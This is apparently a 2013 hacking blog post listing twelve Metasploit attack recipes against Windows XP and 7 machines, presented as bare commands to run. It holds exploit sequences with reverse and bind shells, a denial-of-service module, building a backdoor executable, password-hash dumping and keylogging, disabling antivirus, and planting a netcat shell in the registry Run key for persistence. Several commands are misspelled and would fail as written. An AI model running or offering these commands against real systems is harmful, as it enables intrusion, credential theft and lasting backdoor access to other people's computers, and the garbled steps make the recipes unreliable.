Wednesday, June 12, 2013

MetaSploit Attacks


Hey guys, I've already explained about Metasploit and a few of it's attacks. This post is only for Metasploit users who know the basics of meterpreter, payloads and other stuff. Don't waste your time in reading this if you don't know about Metasploit.  So what's new in this post, let's find out :

Requisites:

Backtrack (Attacker)
VMware (Different victims)
Metasploit (of course... )
A logistic Brain

Note:~ All these tutorials are just commands, because as you can see there are loads of them so just understand them by your own (You just need to run these commands).

Ok so without wasting a second let's do it.



Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1                ----->IP target
set payload windows/vncinject/bind_tcp
exploit


Attack 2.Metasploit vs Windows 7 and AVG

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.0.1             ----->IP Attacker
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell


Attack 3. Hacking By Metasploit . Windows xp Sp3 

use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1                --->ip attacker
set RHOST 192.168.1.1               ----->ip target
set payload windows/meterpreter/reverse_tcp
exploit


Attack 4: Hacking win7 with metasploit

nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1    ------>ip attacker
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.             ------>ip target
set RPORT 4321
show options
exploit


Attack 5: Exploit vulnerability in Windows 7

sudo nmap 192.168.1.1         ------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1             -----------ip target
set RPORT 445
run                              ----run the exploit


Attack 6: Metasploit backdooring

msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe
root@kislay# cd /tmp                  
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1            --->Listener's IP (Attacker)
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg *                    ------->msg displayed on the screen


Attack 7: ms10 025 metasploit exploitation

nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7     --ip target
exploit


Attack 8: IEPeers: ms10_08_ie_behaviors Exploit

search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1        
set URIPATH /
set CMD calc.exe
set target 1
info                              ---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/            ---enter
wait a few moments...


Attack 9: metasploit rpc_dum

nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1        ---->ip target
set LHOST 192.168.0.1        ----->ip attacker
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir


Attack 10: Uploading A Backdoor Metasploit Netcat

meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555


Attack 11:  BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7

cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3                ---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer


Attack 12:  ms067 + netcat backdoor

use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

0 comments:

Post a Comment